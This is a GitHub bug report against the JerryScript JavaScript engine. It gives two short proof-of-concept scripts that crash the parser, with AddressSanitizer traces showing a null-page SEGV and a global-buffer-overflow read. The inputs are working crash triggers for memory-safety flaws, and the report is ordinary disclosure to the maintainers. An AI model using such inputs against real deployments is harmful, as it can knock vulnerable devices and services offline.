search

jerryscript-project / jerryscript

Ultra-lightweight JavaScript engine for the Internet of Things.
https://jerryscript.net
Apache License 2.0
6.96k stars 673 forks source link

SEGV in parser_stack_iterator_read_uint8 #5157

Open Qbtly opened 3 months ago

Qbtly commented 3 months ago
Commit ID

de515316cf603052fe873c0d00c8b265cc8dfee2

Build platform

Ubuntu 22.04.3

Build steps
python3 ./tools/build.py --builddir=xxx --clean --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --stack-limit=20
Execution steps
./jerry poc.js
Test case
//poc1.js
function dec() {};
for (const x = 0; (x) =  dec (); ) {}
Output
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3377315==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000015 (pc 0x55b503ef31b4 bp 0x7fff0752c970 sp 0x7fff0752c830 T0)
==3377315==The signal is caused by a READ memory access.
==3377315==Hint: address points to the zero page.
    #0 0x55b503ef31b4 in parser_stack_iterator_read_uint8 /jerryscript/jerry-core/parser/js/js-parser-mem.c:649
    #1 0x55b503efba9a in parser_free_jumps /jerryscript/jerry-core/parser/js/js-parser-statm.c:3318
    #2 0x55b503e93f0b in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2371
    #3 0x55b503e394d4 in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418
    #4 0x55b503e396ec in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486
    #5 0x55b503f01647 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52
    #6 0x55b503f016e3 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63
    #7 0x55b503e33d91 in main /jerryscript/jerry-main/main-desktop.c:156
    #8 0x7efcbaf8dd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #9 0x7efcbaf8de3f in __libc_start_main_impl ../csu/libc-start.c:392
    #10 0x55b503e36224 in _start (/jerryscript/release/bin/jerry+0x29224)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /jerryscript/jerry-core/parser/js/js-parser-mem.c:649 in parser_stack_iterator_read_uint8
==3377315==ABORTING
Test case
//poc2.js
function dec(x) {};
for (const x = 0; (x) = dec (); ) {}
Output
=====================================
==3377298==ERROR: AddressSanitizer: global-buffer-overflow on address 0x560999fb7c17 at pc 0x560999f8cd25 bp 0x7ffc55b6bf70 sp 0x7ffc55b6bf60
READ of size 1 at 0x560999fb7c17 thread T0
    #0 0x560999f8cd24 in parser_statement_length /jerryscript/jerry-core/parser/js/js-parser-statm.c:291
    #1 0x560999f8cd24 in parser_free_jumps /jerryscript/jerry-core/parser/js/js-parser-statm.c:3379
    #2 0x560999f24f0b in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2371
    #3 0x560999eca4d4 in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:418
    #4 0x560999eca6ec in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:486
    #5 0x560999f92647 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52
    #6 0x560999f926e3 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63
    #7 0x560999ec4d91 in main /jerryscript/jerry-main/main-desktop.c:156
    #8 0x7f718b81dd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #9 0x7f718b81de3f in __libc_start_main_impl ../csu/libc-start.c:392
    #10 0x560999ec7224 in _start (/jerryscript/release/bin/jerry+0x29224)

0x560999fb7c17 is located 4 bytes to the right of global variable 'parser_statement_flags' defined in '/jerryscript/jerry-core/parser/js/js-parser-statm.c:82:22' (0x560999fb7c00) of size 19
SUMMARY: AddressSanitizer: global-buffer-overflow /jerryscript/jerry-core/parser/js/js-parser-statm.c:291 in parser_statement_length
Shadow bytes around the buggy address:
  0x0ac1b33eef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ac1b33eef40: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 03 f9 f9 f9
  0x0ac1b33eef50: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ac1b33eef60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ac1b33eef70: 00 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9
=>0x0ac1b33eef80: 00 00[03]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0ac1b33eef90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ac1b33eefa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ac1b33eefb0: 00 00 00 00 00 00 00 00 00 00 00 00 06 f9 f9 f9
  0x0ac1b33eefc0: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
  0x0ac1b33eefd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3377298==ABORTING